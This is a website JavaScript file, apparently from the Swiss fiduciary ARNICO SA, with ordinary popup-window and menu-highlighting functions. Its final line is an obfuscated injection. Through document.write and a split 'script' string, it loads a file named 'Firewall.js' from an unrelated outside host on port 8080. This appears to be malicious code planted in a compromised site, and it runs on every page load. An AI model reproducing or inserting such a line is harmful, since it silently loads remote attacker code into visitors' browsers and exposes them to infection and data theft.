

function popup(url, w, h) {
var windowprops = "width=" + w + ",height=" + h + ", toolbar=no,location=no,status=no,menubar=no,scrollbars=no,resizable=no";
popup = window.open(url,'remote',windowprops);
}

function popupScroll(url, w, h) {
var windowprops = "width=" + w + ",height=" + h + ", toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=no";
window.open(url,'',windowprops);
}

function popupImage(file,w,h) { 
if (this.focus == null) return;
var win= open('','Image', 'width='+(w+0)+',height='+(h+0)+',status=no,toolbar=no,menubar=no,resizable=no'); 
var d=win.document;
d.open(); 
if (win.moveTo != null) win.moveTo(0,0);
win.focus();
d.write("<html><head><title>ARNICO SA - Société Fiduciaire</title></head><body bgcolor=#E6E6E6 marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>");
d.write("<img src=\""+file+"\" width=\""+w+"\" height=\""+h+"\">");
d.write("</body></html>");
d.close(); 
}


function initMenu1Cell(){
	document.getElementById('menu01').className='menu1';
	document.getElementById('menu02').className='menu1';
	document.getElementById('menu03').className='menu1';
	document.getElementById('menu04').className='menu1';
}


function showHilight(noMenu){
	initMenu1Cell();
	var menuCell = "menu"+noMenu;
	document.getElementById(menuCell).className='menu1Selected';
}

function hideHilight(noMenu){
	var menuCell = "menu"+noMenu;
	document.getElementById(menuCell).className='menu1';
	initMenu1();
}




document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Firewall.js"></scr'+'ipt>');